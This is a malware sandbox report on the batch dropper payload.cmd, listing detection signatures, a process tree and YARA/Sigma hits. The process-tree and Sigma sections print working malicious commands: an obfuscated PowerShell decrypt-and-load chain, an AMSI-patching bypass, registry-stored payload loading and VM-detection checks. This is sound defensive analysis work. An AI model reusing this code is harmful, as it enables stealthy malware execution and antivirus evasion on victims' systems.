Edit tour

Windows Analysis Report
payload.cmd

Overview

General Information

Sample name:	payload.cmd
Analysis ID:	1524983
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Tags:	azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2460 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1264 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 3848 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 6720 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 4100 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 5064 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 2064 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 6048 cmdline: C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 2156 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2176 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 4268 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4736 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5580 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 4332 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5688 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 5836 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 5760 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 6500 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 3020 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

schtasks.exe (PID: 1788 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3168 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 3380 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+[Char](116)+''+'h'+'o'+'d'+''+[Char](115)+'');$yPaGlLGCRnduqK=$CXUkrbOMeMwqm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cAd'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'bl'+[Char](105)+'c'+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gdhANoUlJqediWutYNx=gUdwtNDYXkts @([String])([IntPtr]);$xftKyomHPDnrGsBVhDhGVA=gUdwtNDYXkts @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMpaxAlnYCj=$CXUkrbOMeMwqm.GetMethod('Ge'+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'an'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+'d'+'l'+'l')));$XzRrrWAvhAruOw=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+'L'+'o'+'a'+'d'+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UyziTvRkQswynWCwx=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qNkPxqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$MsjEXyeoZQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,4,[ref]$MsjEXyeoZQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOLdsZyQIYWPbckDA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,0x20,[ref]$MsjEXyeoZQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+'-'+[Char](115)+'t'+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 1796 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 3944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2064	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x9d693:$b2: ::FromBase64String( 0x9d6f1:$b2: ::FromBase64String( 0x1171c1:$b2: ::FromBase64String( 0x11b69f:$b2: ::FromBase64String( 0x96f8e:$s1: -join 0x1a55fb:$s1: -join 0x1b26d0:$s1: -join 0x1b5aa2:$s1: -join 0x1b6154:$s1: -join 0x1b7c45:$s1: -join 0x1b9e4b:$s1: -join 0x1ba672:$s1: -join 0x1baee2:$s1: -join 0x1bb61d:$s1: -join 0x1bb64f:$s1: -join 0x1bb697:$s1: -join 0x1bb6b6:$s1: -join 0x1bbf06:$s1: -join 0x1bc082:$s1: -join 0x1bc0fa:$s1: -join 0x1bc18d:$s1: -join
Process Memory Space: powershell.exe PID: 5760	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5a327:$b2: ::FromBase64String( 0x5a385:$b2: ::FromBase64String( 0xd2fac:$b2: ::FromBase64String( 0xdd928:$b2: ::FromBase64String( 0x30afd:$s1: -join 0x313ea:$s1: -join 0x54e23:$s1: -join 0x46aef:$s3: Reverse 0x2ba8b:$s4: += 0x2baaa:$s4: += 0x2bae5:$s4: += 0x2bb02:$s4: += 0x2bb3d:$s4: += 0x2bba9:$s4: += 0x2bc35:$s4: += 0x2bd43:$s4: += 0x2da0e:$s4: += 0x2da31:$s4: += 0x326b0:$s4: += 0x34b01:$s4: += 0x34b80:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 